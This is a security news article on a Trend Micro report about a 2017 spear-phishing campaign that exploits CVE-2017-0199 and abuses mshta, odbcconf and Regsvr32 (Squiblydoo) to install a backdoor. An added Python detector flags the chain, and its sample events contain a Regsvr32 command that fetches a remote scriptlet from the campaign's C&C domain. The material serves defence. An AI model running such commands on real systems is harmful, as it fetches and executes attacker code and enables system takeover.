Trend Micro warns that an email campaign that first appeared a couple of months ago is currently targeting Russian-speaking enterprises and delivering a new Windows-based backdoor.
The campaign uses a number of different exploits and Windows components to run malicious scripts, an approach intended to make detection and blocking more challenging.
The first sample tied to the spam campaign was seen in five spam runs between June 23 and July 27, 2017. According to security researchers, the campaign is still active and is targeting financial institutions and mining firms.
Experts from Trend Micro point out that the attackers have diversified their tactics by sending different, targeted emails for each run. Given the emails’ limited distribution and the specificity of their social engineering lures, the researchers say the emails should be considered part of a spear-phishing campaign.
The spam emails resemble invoices from sales and billing departments and carry a malformed Rich Text Format (RTF) file that exploits CVE-2017-0199, a vulnerability in the Windows Object Linking and Embedding (OLE) interface used by Microsoft Office, which was patched in April of this year.
When the exploit code runs, it downloads a fake XLS file embedded with malicious JavaScript. When that file is opened, its Excel header is ignored and the file is treated as an HTML Application (HTA) by the mshta.exe Windows component.
The JavaScript code calls odbcconf.exe, a legitimate Windows executable that performs various tasks associated with Microsoft Data Access Components, to run a DLL. Once installed, the DLL drops a file in the %APPDATA% folder and appends the .TXT extension to it.
The DLL then calls the Regsvr32 (Microsoft Register Server) command-line utility to execute that file with specific parameters. This technique is known as Squiblydoo: it abuses Regsvr32 to bypass restrictions on running scripts and to evade application whitelisting protections such as AppLocker.
“While Squiblydoo is already a known attack vector, this is the first time we’ve seen it combined with odbcconf.exe,” Trend Micro says.
Another XML file is then downloaded from the domain wecloud[.]biz and executed through the same Regsvr32-abusing Squiblydoo technique; this file is the main backdoor used in the attack.
The backdoor is a SCT file with obfuscated JavaScript code inside and supports commands that “essentially allow attackers to take over an infected system.” The backdoor attempts to connect to the command and control (C&C) server at hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks.
Depending on the commands received, the malware can download and execute Portable Executable (PE) files, run shell commands, download additional or new scripts, delete files and startup entries, or run a new script and terminate the current one.
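As an added illustration of how a defender might spot the chain described above (this is not code from the Trend Micro report), the following Python detector scans constructed process-creation events for the parent/child relationships and the Regsvr32 command-line shape involved. The winword.exe parent, the "/i:http" Regsvr32 form and the odbcconf command line are assumptions drawn from the publicly documented techniques, not details quoted from the report.

```python
import re

# Parent/child pairs reproducing the chain in the report. winword.exe as the parent
# of mshta.exe is an assumption (Office handing the HTA to mshta via CVE-2017-0199).
SUSPICIOUS_PARENT_CHILD = {
    ("winword.exe", "mshta.exe"),
    ("mshta.exe", "odbcconf.exe"),
    ("odbcconf.exe", "regsvr32.exe"),
}
# Squiblydoo: Regsvr32 fetching a remote scriptlet. The "/i:http" form is the publicly
# documented shape of the technique (assumed); the report only says "specific parameters".
REMOTE_SCRIPTLET_RE = re.compile(r"regsvr32(?:\.exe)?\b.*/i:\s*https?://", re.I)
C2_DOMAIN = "wecloud.biz"  # written as wecloud[.]biz in the report

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify_event(ev: dict) -> list:
    """Return the reasons a process-creation event matches the chain (empty if none)."""
    reasons = []
    pair = (basename(ev.get("parent", "")), basename(ev.get("image", "")))
    if pair in SUSPICIOUS_PARENT_CHILD:
        reasons.append(f"unexpected parent/child: {pair[0]} -> {pair[1]}")
    cmd = ev.get("cmdline", "")
    if REMOTE_SCRIPTLET_RE.search(cmd):
        reasons.append("regsvr32 loading a remote scriptlet (Squiblydoo)")
    if C2_DOMAIN in cmd.lower():
        reasons.append(f"reference to known C&C domain {C2_DOMAIN}")
    return reasons

def scan(events: list) -> list:
    """Return the events that matched at least one rule, annotated with their reasons."""
    return [{**ev, "reasons": "; ".join(r)} for ev in events if (r := classify_event(ev))]

# Constructed sample events modelled on Sysmon Event ID 1 fields (not real logs);
# the odbcconf "/a {REGSVR ...}" command-line shape is likewise an assumption.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\invoice.xls"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf.exe /a {REGSVR C:\Users\u\AppData\Roaming\x.txt}"},
    {"parent": r"C:\Windows\System32\odbcconf.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:https://wecloud.biz/mail/ajax.php scrobj.dll"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the benign Regsvr32 registration alone; the same rules map directly onto a SIEM query over real process-creation telemetry.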
According to experts from Trend Micro, “While the later stages of the infection chain required the use of various Windows components, the entry point still involves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users. Alternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL categorization, as well as enforcing robust patch management policies, will significantly reduce the system’s attack surface.”